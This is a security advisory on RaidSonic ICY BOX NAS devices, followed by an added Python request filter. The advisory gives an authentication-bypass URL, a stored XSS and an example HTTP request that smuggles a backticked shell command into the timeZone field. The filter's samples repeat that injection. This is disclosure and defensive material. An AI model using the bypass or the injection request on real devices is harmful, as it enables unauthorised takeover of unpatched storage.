
RaidSonic IB-NAS5220 and IB-NAS4220-B Multiple Vulnerabilities

Published: 2013-09-25
Updated: 2013-11-02

Affected systems:
Raidsonic ICY BOX NAS-4220-B 2.6.3.IB.1.RS.1
Raidsonic ICY BOX NAS-5220 2.6.3-20100206S
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57958

RaidSonic IB-NAS5220 and IB-NAS4220-B are network-attached storage devices. They do not properly filter the value of the "ping_size" parameter in the /cgi/time/timeHandler.cgi script. A remote attacker who successfully exploits this flaw can execute arbitrary commands.

<*Source: m-1-k-3

  Links: http://www.osvdb.org/90221
         http://secunia.com/advisories/52216/
*>

Test method:
--------------------------------------------------------------------------------

Warning: the following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

Device Name: IB-NAS5220 / IB-NAS4220-B
Vendor: Raidsonic

============ Vulnerable Firmware Releases: ============

Product Name IB-NAS5220 / IB-NAS4220-B
Tested Firmware IB5220: 2.6.3-20100206S
Tested Firmware IB4220: 2.6.3.IB.1.RS.1

Firmware Download: http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip

============ Vulnerability Overview: ============

    * Authentication Bypass:

-> Access the following URL to bypass the login procedure:
http://<IP>/nav.cgi?foldName=adm&localePreference=en

    * Stored XSS:

System -> Time Settings -> NTP Server -> User Define
Injecting scripts into the parameter ntp_name reveals that this parameter is not properly validated for malicious input. You are able to place this script without authentication.
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/ICY-Box-Stored-XSS.png

    * Unauthenticated OS Command Injection

The vulnerability is caused by missing input validation in the ping_size parameter and can be exploited to inject and execute arbitrary shell commands.

Example Exploit:
POST /cgi/time/timeHandler.cgi HTTP/1.1
Host: 192.168.178.41
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.178.41/cgi/time/time.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 186

month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210&old_timeZone=Amsterdam&renew=0

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/Raidsonic-IB-NAS-command-execution.png

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-010
Twitter: @s3cur1ty_de

============ Time Line: ============

August 2012 - discovered vulnerability
27.08.2012 - contacted vendor with vulnerability details for IB-NAS4220-B
28.08.2012 - vendor responded that they will not publish an update
15.10.2012 - contacted vendor with vulnerability details for IB-NAS5220
15.10.2012 - vendor responded that they will not publish an update
12.02.2013 - public release
===================== Advisory end =====================

Recommendation:
--------------------------------------------------------------------------------
Vendor patch: Raidsonic
---------
The vendor has not yet provided a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:
http://www.raidsonic.de/en/service.php
http://www.raidsonic.de/data/Downloads/Firmware/IB-NAS5220_standard.zip
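Because no vendor fix exists, an allow-list check in front of the device (a reverse proxy or WAF rule) is the practical mitigation for the command injection described above. The following Python is an added example, not code from the advisory or from the vendor's firmware: it screens request bodies sent to timeHandler.cgi for shell metacharacters and for values outside the expected format of each field. The per-field patterns are assumptions derived from the request shown in the advisory (the device's real parameter schema is not published); they cover both the ping_size parameter named in the description and the timeZone field used in the example request. The sample bodies are constructed.

```python
import re
from urllib.parse import parse_qs

# Characters that let a value break out into the shell when the CGI builds a
# command string by concatenation (the root cause of the injection above).
SHELL_META = re.compile(r"[`;|&$(){}<>\n\r]")

# Allow-list per form field. Assumption: derived from the advisory's request;
# the device's real schema is not published. Fields absent here are still
# screened for shell metacharacters.
EXPECTED = {
    "month": r"^\d{1,2}$",
    "date": r"^\d{1,2}$",
    "year": r"^\d{4}$",
    "hour": r"^\d{1,2}$",
    "minute": r"^\d{1,2}$",
    "m": r"^(AM|PM)$",
    "timeZone": r"^[A-Za-z_/+-]+$",   # e.g. Amsterdam or Europe/Berlin
    "ntp_type": r"^[a-z]+$",
    "ping_size": r"^\d{1,5}$",        # the parameter named in the description
}

def find_injections(body: str) -> dict:
    """Return {field: value} for every field that fails its allow-list or
    carries a shell metacharacter; an empty dict means the body looks benign."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            pattern = EXPECTED.get(name)
            if SHELL_META.search(value) or (pattern and not re.fullmatch(pattern, value)):
                findings[name] = value
    return findings

# Constructed sample bodies: a legitimate time update, the advisory's request
# body with its COMMAND placeholder, and a ping_size variant of the same pattern.
SAMPLES = {
    "benign": "month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam"
              "&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210"
              "&old_timeZone=Amsterdam&renew=0",
    "advisory": "month=1&date=1&year=2007&hour=12&minute=10&m=PM&timeZone=Amsterdam`COMMAND`"
                "&ntp_type=default&ntpServer=none&old_date=+1+12007&old_time=1210"
                "&old_timeZone=Amsterdam&renew=0",
    "ping_size": "ping_size=64%60COMMAND%60&ping_count=4",
}

def scan_samples() -> dict:
    """Run the check over every sample body; returns {label: findings}."""
    return {label: find_injections(body) for label, body in SAMPLES.items()}

if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label:10s} -> {'ALERT ' + str(hits) if hits else 'ok'}")
```

Logging the flagged field and value (not executing anything with it) gives the incident record a defender needs to confirm exploitation attempts against an unpatched unit.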